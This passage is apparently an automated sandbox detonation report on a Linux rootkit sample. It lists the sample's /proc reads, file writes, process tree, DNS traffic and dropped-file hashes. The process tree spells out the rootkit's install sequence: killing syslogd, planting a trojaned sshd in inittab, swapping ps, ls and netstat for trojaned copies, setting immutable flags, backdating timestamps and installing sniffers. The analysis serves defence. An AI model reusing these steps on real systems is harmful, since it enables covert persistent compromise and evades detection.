| File opened for reading | /proc/402/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/146/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/310/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/81/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/886/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/532/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/313/stat | /bin/pidof | N/A |
| File opened for reading | /proc/371/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/2/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/77/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/383/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/145/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/371/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/77/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/36/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/799/stat | /bin/pidof | N/A |
| File opened for reading | /proc/708/stat | /bin/ps | N/A |
| File opened for reading | /proc/77/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/146/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/384/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/496/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/371/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/70/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/913/stat | /bin/ps | N/A |
| File opened for reading | /proc/384/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/223/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/14/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/70/stat | /bin/ps | N/A |
| File opened for reading | /proc/483/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/483/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11/stat | /bin/pidof | N/A |
| File opened for reading | /proc/146/stat | /bin/pidof | N/A |
| File opened for reading | /proc/312/status | /bin/ps | N/A |
| File opened for reading | /proc/345/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/stat | /bin/pidof | N/A |
| File opened for reading | /proc/75/stat | /bin/ps | N/A |
| File opened for reading | /proc/706/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/384/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/372/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/496/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/114/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/705/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/78/cmdline | /bin/pidof | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118
[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]
/usr/bin/whoami
[whoami]
/bin/tar
[tar zxf ./bin.tgz]
/bin/tar
[tar zxf ./conf.tgz]
/bin/tar
[tar zxf ./lib.tgz]
/bin/tar
[tar zxf ./utilz.tgz]
/bin/tar
[tar zxf ./sshd.tgz]
/bin/rm
[rm -rf ./sshd.tgz]
/bin/rm
[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]
/bin/sleep
[sleep 2]
/usr/bin/killall
[killall -9 syslogd]
/bin/date
[date +%S]
/bin/sleep
[sleep 2]
/bin/hostname
[hostname -f]
/bin/grep
[grep -v ^$]
/bin/grep
[grep -v ^# /etc/syslog.conf]
/bin/grep
[grep @]
/usr/bin/cut
[cut -d @ -f 2]
/bin/uname
[uname -n]
/bin/mv
[mv lib/libproc.a /lib/]
/bin/mv
[mv lib/libproc.so.2.0.6 /lib/]
/sbin/ldconfig
[/sbin/ldconfig]
/usr/bin/md5sum
[md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /etc/sh.conf]
/bin/chown
[chown -f root:root /etc/sh.conf]
/usr/bin/chattr
[chattr +isa /etc/sh.conf]
/bin/rm
[rm -rf /tmp/bin/.sh/shdcf2]
/bin/mv
[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]
/bin/mv
[mv /tmp/conf/lidps1.so /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/conf/*]
/bin/mv
[mv /tmp/conf/* /usr/include/]
/bin/mkdir
[mkdir /lib/libsh.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/libsh.so]
/bin/mkdir
[mkdir /usr/lib/libsh]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh]
/bin/mv
[mv .sh/* /lib/libsh.so/]
/bin/mv
[mv .sh/.bashrc /usr/lib/libsh]
/bin/mv
[mv /lib/libsh.so/sshd /sbin/ttyload]
/bin/chmod
[chmod a+xr /sbin/ttyload]
/bin/chmod
[chmod o-w /sbin/ttyload]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttyload]
/usr/bin/chattr
[chattr +isa /sbin/ttyload]
/bin/pidof
[pidof ttyload]
/bin/mv
[mv /tmp/bin/ttymon /sbin/ttymon]
/bin/chmod
[chmod a+xr /sbin/ttymon]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttymon]
/usr/bin/chattr
[chattr +isa /sbin/ttymon]
/bin/pidof
[pidof ttymon]
/bin/cp
[cp /bin/bash /lib/libsh.so]
/usr/bin/chattr
[chattr -isa /etc/inittab]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v ttyload]
/bin/grep
[grep -v getty]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep getty]
/bin/cat
[cat /tmp/.init2]
/usr/bin/touch
[touch -acmr /bin/ls /usr/sbin/ttyload]
/bin/chmod
[chmod +x /usr/sbin/ttyload]
/usr/bin/chattr
[chattr +isa /usr/sbin/ttyload]
/usr/sbin/ttyload
[/usr/sbin/ttyload]
/sbin/ttyload
[/sbin/ttyload -q]
/sbin/ttymon
[/sbin/ttymon]
/usr/bin/touch
[touch -amcr /etc/inittab /tmp/.init1]
/bin/mv
[mv -f /tmp/.init1 /etc/inittab]
/bin/rm
[rm -rf /tmp/.init2]
/bin/grep
[grep ttyload /etc/inittab]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ps]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ls]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/find]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/top]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/md5sum]
/tmp/encrypt
[./encrypt -e .shmd5 /dev/srd0]
/usr/bin/touch
[touch -acmr /bin/ls /dev/srd0]
/usr/bin/chattr
[chattr a+r /dev/srd0]
/bin/chown
[chown -f root:root /dev/srd0]
/bin/rm
[rm -rf .shmd5]
/usr/bin/touch
[touch -acmr /sbin/ifconfig ifconfig]
/usr/bin/touch
[touch -acmr /bin/ps ps]
/usr/bin/touch
[touch -acmr /bin/ls ls]
/usr/bin/touch
[touch -acmr /bin/netstat netstat]
/usr/bin/touch
[touch -acmr /usr/bin/find find]
/usr/bin/touch
[touch -acmr /usr/bin/top top]
/usr/bin/touch
[touch -acmr /usr/sbin/lsof lsof]
/usr/bin/touch
[touch -acmr /sbin/syslogd syslogd]
/usr/bin/touch
[touch -acmr /usr/bin/slocate slocate]
/usr/bin/touch
[touch -acmr /usr/bin/dir dir]
/usr/bin/touch
[touch -acmr /usr/bin/md5sum md5sum]
/usr/bin/touch
[touch -acmr /usr/bin/pstree pstree]
/bin/mkdir
[mkdir /usr/lib/libsh/.backup]
/usr/bin/chattr
[chattr -isa /bin/ps]
/bin/cp
[cp /bin/ps /usr/lib/libsh/.backup]
/bin/mv
[mv -f ps /bin/ps]
/usr/bin/chattr
[chattr +isa /bin/ps]
/usr/bin/chattr
[chattr -isa /sbin/ifconfig]
/bin/cp
[cp /sbin/ifconfig /usr/lib/libsh/.backup]
/bin/mv
[mv -f ifconfig /sbin/ifconfig]
/usr/bin/chattr
[chattr +isa /sbin/ifconfig]
/usr/bin/chattr
[chattr -isa /bin/netstat]
/bin/cp
[cp /bin/netstat /usr/lib/libsh/.backup]
/bin/mv
[mv -f netstat /bin/netstat]
/usr/bin/chattr
[chattr +isa /bin/netstat]
/usr/bin/chattr
[chattr -isa /usr/bin/top]
/bin/cp
[cp /usr/bin/top /usr/lib/libsh/.backup]
/bin/mv
[mv -f top /usr/bin/top]
/usr/bin/chattr
[chattr +isa /usr/bin/top]
/usr/bin/chattr
[chattr -isa /bin/ls]
/bin/cp
[cp /bin/ls /usr/lib/libsh/.backup]
/bin/mv
[mv -f ls /bin/ls]
/usr/bin/chattr
[chattr +isa /bin/ls]
/usr/bin/chattr
[chattr -isa /usr/bin/find]
/bin/cp
[cp /usr/bin/find /usr/lib/libsh/.backup]
/bin/mv
[mv -f find /usr/bin/find]
/usr/bin/chattr
[chattr +isa /usr/bin/find]
/usr/bin/chattr
[chattr -isa /usr/bin/pstree]
/bin/cp
[cp /usr/bin/pstree /usr/lib/libsh/.backup]
/bin/mv
[mv -f pstree /usr/bin/pstree]
/usr/bin/chattr
[chattr +isa /usr/bin/pstree]
/usr/bin/chattr
[chattr -isa /usr/bin/md5sum]
/bin/cp
[cp /usr/bin/md5sum /usr/lib/libsh/.backup]
/bin/mv
[mv -f md5sum /usr/bin/md5sum]
/usr/bin/chattr
[chattr +isa /usr/bin/md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz/*]
/bin/mv
[mv /tmp/utilz /usr/lib/libsh/]
/bin/mkdir
[mkdir /usr/lib/libsh/.sniff]
/bin/mv
[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]
/bin/mv
[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]
/bin/mv
[mv /tmp/bin/shsb /usr/lib/libsh/shsb]
/bin/mv
[mv /tmp/bin/hide /usr/lib/libsh/hide]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/shsb]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/hide]
/bin/chmod
[chmod +x /usr/lib/libsh/.sniff/*]
/bin/chmod
[chmod +x /usr/lib/libsh/shsb]
/bin/chmod
[chmod +x /usr/lib/libsh/hide]
/bin/ps
[ps aux]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep named]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep smbd]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep rpc.statd]
/bin/rm
[rm -rf /tmp/.procs]
/bin/cat
[cat /tmp/.stats]
/bin/grep
[grep 443]
/bin/grep
[grep http]
/bin/rm
[rm -rf /tmp/.stats]
/bin/mkdir
[mkdir /usr/lib/libsh/.owned]
/usr/bin/chattr
[chattr +isa /usr/lib/libsh]
/usr/bin/chattr
[chattr +isa /lib/libsh.so]
/usr/bin/killall
[killall -9 -q nscd]
/usr/bin/killall
[killall -9 -q xntps]
/usr/bin/killall
[killall -9 -q mountd]
/usr/bin/killall
[killall -9 -q mserv]
/usr/bin/killall
[killall -9 -q psybnc]
/usr/bin/killall
[killall -9 -q t0rns]
/usr/bin/killall
[killall -9 -q linsniffer]
/usr/bin/killall
[killall -9 -q sniffer]
/usr/bin/killall
[killall -9 -q lpsched]
/usr/bin/killall
[killall -9 -q sniff]
/usr/bin/killall
[killall -9 -q sn1f]
/usr/bin/killall
[killall -9 -q sshd2]
/usr/bin/killall
[killall -9 -q xsf]
/usr/bin/killall
[killall -9 -q xchk]
/usr/bin/killall
[killall -9 -q ssh2d]
/sbin/ifconfig
[/sbin/ifconfig eth0]
/bin/grep
[grep inet addr:]
/usr/bin/awk
[awk -F {print $2} ]
/usr/bin/cut
[cut -c6-]
/bin/hostname
[hostname -f]
/bin/uname
[uname -a]
/usr/bin/awk
[awk { print $11 }]
/bin/cat
[cat /tmp/info_tmp]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/usr/bin/awk
[awk {print $3}]
/bin/hostname
[hostname -i]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep eth]
/usr/bin/wc
[wc -l]
/usr/bin/head
[head -1 /etc/debian_version]
/bin/rm
[rm -rf /tmp/info_tmp]
/bin/date
[date +%S]
/usr/bin/expr
[expr 20 - 21]
/sbin/iptables
[/sbin/iptables -L input]
/usr/bin/head
[head -5]
/sbin/syslogd
[/sbin/syslogd -m 0]
/bin/rm
[rm -rf ../shv5*]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
Files
/var/cache/ldconfig/aux-cache~
| MD5 | 1a71e452a82883488b050dedec78788d |
| SHA1 | 7991d8edff285450d0ebd0bbb7ad5d4f79f803e5 |
| SHA256 | ded190ca15a72591016d81b5405351ac765504cae0a578bdb4538ca3fc7239cd |
| SHA512 | cb3c8bae1d229e75201b9d2872a4ceaffdca54cf4da11eb6b50aac80219b037da58c264e9a4a511b8682d5e9987b33129bc495ab8ec0e92002c174180afa09a5 |
/lib/libsh.so/bash
| MD5 | 59d4ddd8dafe5d32d364d3f079f9d047 |
| SHA1 | 123c130531cd265e7a4ed43ac71ea9b280ccf15c |
| SHA256 | 0df0983446a29ee4a99d696871c53ff5346a282fdddb85779cd1ccb338bc18d2 |
| SHA512 | 433fb7514c3ea8eba49980a97004e19d104643a93df08fb28d9e6886c2ccf845b894b3dd7e42dccfa493b4f8d58dfa2056677e370dcba10096fe886c3d0545a9 |
/tmp/.init1
| MD5 | ba6ed6a3d425270d5374b0c2b54b3008 |
| SHA1 | 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec |
| SHA256 | 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359 |
| SHA512 | 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c |
/tmp/.init1
| MD5 | 0dae4739f83623a59236ecfabe00007b |
| SHA1 | 4b2b361ba9cf76213d2c4d6ba67e80099405f810 |
| SHA256 | 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0 |
| SHA512 | 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74 |
/tmp/.init1
| MD5 | 21df30feebe94d25ce99e861e3642895 |
| SHA1 | 3624439d7e9ac4463f83f1658205367ef27a2234 |
| SHA256 | d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5 |
| SHA512 | 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb |
/tmp/.init1
| MD5 | 74e8461d4c9dd715082f15ef51e3ecac |
| SHA1 | 0504be0510ac79c4f7c8d5477032408f9b63a651 |
| SHA256 | 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de |
| SHA512 | 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c |
/tmp/.init1
| MD5 | 8c053b4b674ebfcf6d38503608c5c8db |
| SHA1 | 9927d232e5bb15e3b6bbe461e0041d74649b963a |
| SHA256 | 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc |
| SHA512 | 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222 |
/usr/sbin/ttyload
| MD5 | b46702355aecfc0bd14c525655eccb8b |
| SHA1 | 85ae2258fdf63f04130470356e4d0ba13cce49b4 |
| SHA256 | d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7 |
| SHA512 | db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151 |
/usr/sbin/ttyload
| MD5 | 53e75bf7964b0fb15cbe3028a151ed65 |
| SHA1 | 116589e3b65166f73be2c6e8bb3b09c07641a762 |
| SHA256 | 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805 |
| SHA512 | ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316 |
/tmp/.shmd5
| MD5 | a142966484e4fa766d5b0ba009adcc4d |
| SHA1 | 475312960c96053dbdcea844bd924270fa4d0d92 |
| SHA256 | 23754f3d7f436e41822bfdf2c84a1b26d9648fd63c00a051dadcb1add8cc8d38 |
| SHA512 | 4302144590ca1e72d10aea3737d868dfb3900325cc723bd5569c7c06d97d625522064944dbf24600a019466919c210a605a9669793951102d473b3167b30ef7f |
/tmp/.shmd5
| MD5 | 7219d79f78b22bb838fa3aa91df8f1b5 |
| SHA1 | d9f1e8979927bbbe01e6a81c1461b80d7d1e5dd9 |
| SHA256 | 72cd95262c9e840adacfd9b26841774bf1ccf108bd8bf90959014dca47e1826c |
| SHA512 | 02acd3630e7aefbae724564145a4367d9312c37e7f51d35c05b41dc8c92e7dd121fa0baaa02308a83471c57a2355e9e5e2c5c8fd1ab8951c7b64f03c22ca00cd |
/tmp/.shmd5
| MD5 | 0da64e6935b4052896bed0234ccf0638 |
| SHA1 | 0cbe4411c422da3e6b067ab9cbe8cad571c394f4 |
| SHA256 | b403c409b13822ee1a3de6bd2c77d211045bf9ac27c9cc8ee8c7435afa06d726 |
| SHA512 | 02f9e94f46f99d79b17a3c603884cdc1a4210086591f3f0257fadba25b85c54d3ae31644d4d7b1b6a6f8200cd26ce47a9e89b2c8a4a9e2c8ec1e3d24b0c2218c |
/tmp/.shmd5
| MD5 | 3d8093ee63635cb0f62b6609a59468a3 |
| SHA1 | 2ee12c85b4e0766268ef92f6dbeb12f74efa3a8a |
| SHA256 | b8acb3c4f4cb02911febe0342ccc8d152f025ce95c2c7bc9640482cf297e50e4 |
| SHA512 | eae2d20f56ed699500a7ad0913ab9280ef43ce855bdab04db9c50562323867269b56d8b3d6b29d87b6e60557d08927f2aea7cce69f701b1c2699fcbe1f40efde |
/tmp/.shmd5
| MD5 | c33172192a05f176033f7ef4fb6366aa |
| SHA1 | 44303d41fca5a06a360efa3ad384257d22118a62 |
| SHA256 | 403c3d73839b70e99a88f9d7005ad80685e3c54a020822d9ef9d3b3b8a7003ea |
| SHA512 | 74cb4265d0ccbb06f61e64219002608fa6925235cf630dab81a0cb8cd233180f692557a0bd8ffd72f9b2f9700c11794a19cfadf8dfabd4e200120d7ae4c5dd4c |
/usr/lib/libsh/.backup/ps
| MD5 | 69a3710ded58f73be52a7044f657fd3c |
| SHA1 | 4fed31f8fb6e45a85991047817f071f4679f5e4a |
| SHA256 | 3228f37325fbea367ee9c696f5d70b35e5039fca394b0710a250462cbadb7ce0 |
| SHA512 | 4564394a034eced894e72259ec86a52e1b5727bd00a48e3e36e3a507e5ecc20d1091360da3bd3890d4a9ed9f610251406b3c2a792be27083ce5ebf4937ed46d6 |
/usr/lib/libsh/.backup/top
| MD5 | e7d7268ac21b933b811affa4085a6d16 |
| SHA1 | fdd45ceec126ca49ce7bc30901cc21f1ec5ee59b |
| SHA256 | bc18d4c41b35f4b1f7e85b3c76a4dd00fd1b862ce07b7ed5fc3a6a97cde039ee |
| SHA512 | be56a771991a1d99a21560b496846cff9eb54a1036adfdaa0a37bbfe9adc148e2ca425ba9092d4d4e2a2323affe1dded974479d82fdd0c58cddb9e27868cf008 |
/usr/lib/libsh/.backup/ls
| MD5 | 26a61638b9adcf33bdf75aaf905f183f |
| SHA1 | 4447e881c94f6054d602099e504fadf13e32ba2e |
| SHA256 | c9fec147777ddab82f8e5ed3b4d8181686c291440cef7aa0d9336ab88d35fde9 |
| SHA512 | db8f7b10bad548923974d91f3407a831802ce5595648f55af06e923fd7d1980f100bab85d6e088dd0f2adf98c63ffab42c590e733790fa37c9010dd6951fedcf |
/usr/lib/libsh/.backup/find
| MD5 | 97b5c6c1b307114efc38193175a343c3 |
| SHA1 | 24015d4f95c6878ea5027c134eddebb7126b610f |
| SHA256 | b1a89f313023b476fc826d8fac689679504e61ae8e650681fb966e810ed34970 |
| SHA512 | e5359f3e082f54f5cfd7afa7771d8724d161d48d09372f203bdca222a47a63919fdfb76b6db7fb8ff61e92f8fd04fdec962e94331ff12705cf53ce5e23d33180 |
/usr/lib/libsh/.backup/pstree
| MD5 | b50f49b8ce8dc659e3fc303e58194d98 |
| SHA1 | e7ecfedde9c843eac59b78c52cbdf887f41c0148 |
| SHA256 | 10ff5e8257ca77c4543eed2324ff264d178ae0ce20c3aa00a36e7d45d636d777 |
| SHA512 | 9c8db125ba78f382811d7e6f7c6cb304a35ec97875b555c05179c906e153ef2c743205cdc1a6a1faf0a970dc15a7dd0bc2c7b3ef4711f4e83d7f1878d21f39c9 |
/usr/lib/libsh/.backup/md5sum
| MD5 | bc2ae3c09ce773bfb3e92d2bf8ede6ea |
| SHA1 | 6a590a62de47e308ec4bd0fbbc6b77e22b9cfd61 |
| SHA256 | 984b34e82702c1e1c967050f684d0ada601215451fa68ff6629e9e8df7258172 |
| SHA512 | dcab4048eafc622f5be0cc0b28e95ccf7e2a8033b22dd996f01352fd437a4a8424d79816e6f88bee7fcbd7f78ee66145381acbd89d7f3fe4b9416b386283678c |
/tmp/.procs
| MD5 | 667258594d37069bc1f95b03bdb26077 |
| SHA1 | 0eba2ec0d782a02c19d073fa19e3f9236da34317 |
| SHA256 | 53df39dec9e2c3b170355ccc3b9cd4ecda72370fa77a1147eeb66a57617e141d |
| SHA512 | aa1fd900136effd8a8d2bb20933948fdfb988feb7da34a5ab8072ad3a871a25bb318364e8fefa8025818195ab27a31c55cd1081249c09611c94311c0c33eede9 |
/tmp/info_tmp
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
debian9-mipsel-20240611-en
Max time kernel
39s
Max time network
40s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/801/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/154/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/681/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/857/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/713/stat | /bin/ps | N/A |
| File opened for reading | /proc/669/stat | /bin/pidof | N/A |
| File opened for reading | /proc/232/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/75/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/339/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/stat | /bin/pidof | N/A |
| File opened for reading | /proc/857/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/334/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/684/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/339/stat | /bin/ps | N/A |
| File opened for reading | /proc/331/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/331/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/73/stat | /bin/pidof | N/A |
| File opened for reading | /proc/37/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/435/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /bin/pidof | N/A |
| File opened for reading | /proc/383/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/435/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/886/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/684/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/811/stat | /bin/pidof | N/A |
| File opened for reading | /proc/332/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/711/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/703/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/177/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/676/stat | /usr/bin/killall | N/A |
